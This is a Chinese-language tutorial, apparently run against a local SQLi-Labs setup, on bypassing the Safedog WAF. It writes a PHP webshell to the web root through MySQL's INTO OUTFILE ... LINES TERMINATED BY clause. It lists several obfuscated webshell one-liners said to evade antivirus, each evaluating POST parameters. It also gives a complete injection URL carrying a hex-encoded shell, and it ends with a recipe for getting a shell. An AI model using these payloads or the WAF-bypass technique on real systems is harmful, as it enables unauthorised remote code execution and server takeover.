实验环境
1、phpstudy搭建的SQLi-Labs(MySQL)
2、安全狗4.0
成功所需要的条件
1、准备一个可以过狗过杀软的一句话
2、网站目录的绝对路径
直接进入正题
普通的注入攻击直接被安全狗拦截
比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/”
(这里获取网站绝对路径有很多方式,不一一说明)
这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY”
它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL的这个功能进行过滤检测。
这里分享几个可以过狗过杀软的一句话:
<?php '%00';"${/*%00*//*ee*/@/*vve*/@/*asd*/@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Eval(@@@${/*_POCT*/"_PO"/*ce*/."ST"/*POCT*/}/**/['pass']/**/)/**//**/}/**/";
"${phpinfo()}";
"$@{phpinfo()}";
"${@@!phpinfo() }";
${"_POST"}['id’] == $_POST[‘id’];
var_dump(${"_POST"}['id']);
<?php
define(@"_"/*("%00_")*/, range(1,200), true);eval("echo '';".'/*");*/'.
${
''."_".''.chr(_[79]).''.
"OST".""}
[chr(_[104]).'d'.'']
);
?>
这里我们使用第一个进行构造Payload:
http://192.168.48.138:8980/sqli/Less%2D1/?id=1' LIMIT 0,1 INTO OUTFILE 'C:/phpStudy4IIS/WWW/ma7.php' LINES TERMINATED BY 0x3c3f7068702027253030273b22247b2f2a2530302a2f2f2a65652a2f402f2a7676652a2f402f2a6173642a2f404040404040404040404040404040404040404040404040404040404040404040404576616c28404040247b2f2a5f504f43542a2f225f504f222f2a63652a2f2e225354222f2a504f43542a2f7d2f2a2a2f5b2770617373275d2f2a2a2f292f2a2a2f2f2a2a2f7d2f2a2a2f223b --+
(这里的马需要使用十六进制编码)
成功注入后看一下效果
看一下马:
总结
1、使用“LINES TERMINATED BY ”过狗
2、使用免杀一句话过狗过杀软
3、配合网站绝对路径一步到位getshell